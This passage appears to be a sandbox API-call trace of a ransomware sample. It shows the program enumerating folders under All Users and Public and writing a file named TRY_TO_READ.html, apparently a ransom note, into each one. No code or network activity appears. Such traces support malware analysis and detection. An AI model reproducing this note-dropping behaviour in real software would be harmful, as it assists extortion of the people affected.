(HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.453] GetLastError () returned 0x0 [0117.453] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.455] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.455] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.456] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.456] CloseHandle (hObject=0x468) returned 1 [0117.456] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.456] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.456] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.456] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360c88 | out: hHeap=0x2e0000) returned 1 [0117.456] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0117.456] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.456] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.456] GetLastError () returned 0x0 [0117.456] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Start Menu\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\start menu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.457] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.457] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.458] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.458] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.458] CloseHandle (hObject=0x468) returned 1 [0117.458] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.458] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.458] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.458] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3841b8 | out: hHeap=0x2e0000) returned 1 [0117.458] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0117.458] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.458] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.458] GetLastError () returned 0x0 [0117.458] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\sun\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.459] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.459] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.460] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.460] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.460] CloseHandle (hObject=0x468) returned 1 [0117.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0117.461] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0117.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.461] GetLastError () returned 0x0 [0117.461] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Templates\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\templates\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.462] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.463] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.463] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.463] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.464] CloseHandle (hObject=0x468) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384200 | out: hHeap=0x2e0000) returned 1 [0117.464] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x970c6210, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.464] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.464] GetLastError () returned 0x0 [0117.464] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x970c6210, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0117.464] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350818 | out: hHeap=0x2e0000) returned 1 [0117.464] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default User\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x970c6210, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0117.464] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344688 | out: hHeap=0x2e0000) returned 1 [0117.464] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350840 | out: hHeap=0x2e0000) returned 1 [0117.464] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35ddd8 [0117.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.465] GetLastError () returned 0x5 [0117.465] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.465] GetLastError () returned 0x5 [0117.465] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0117.465] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.465] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.465] GetLastError () returned 0x5 [0117.465] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.466] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.466] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.466] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.467] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.467] CloseHandle (hObject=0x46c) returned 1 [0117.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0117.467] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0117.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.467] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.467] GetLastError () returned 0xb7 [0117.467] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0117.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.467] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.467] GetLastError () returned 0xb7 [0117.467] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.468] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.468] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.469] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.469] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.469] CloseHandle (hObject=0x46c) returned 1 [0117.469] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.469] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.469] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.469] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3842d8 | out: hHeap=0x2e0000) returned 1 [0117.469] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0117.469] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.469] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.469] GetLastError () returned 0xb7 [0117.469] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\downloads\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.470] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.470] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.471] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.471] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.471] CloseHandle (hObject=0x46c) returned 1 [0117.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384320 | out: hHeap=0x2e0000) returned 1 [0117.471] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0117.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.471] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.471] GetLastError () returned 0x0 [0117.471] CreateFileW (lpFileName="C:\\\\Users\\Public\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.472] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.472] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.473] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.473] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.473] CloseHandle (hObject=0x46c) returned 1 [0117.473] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.473] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.473] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.473] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384368 | out: hHeap=0x2e0000) returned 1 [0117.473] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0117.473] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.473] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.473] GetLastError () returned 0xb7 [0117.473] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\libraries\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.487] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.487] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, 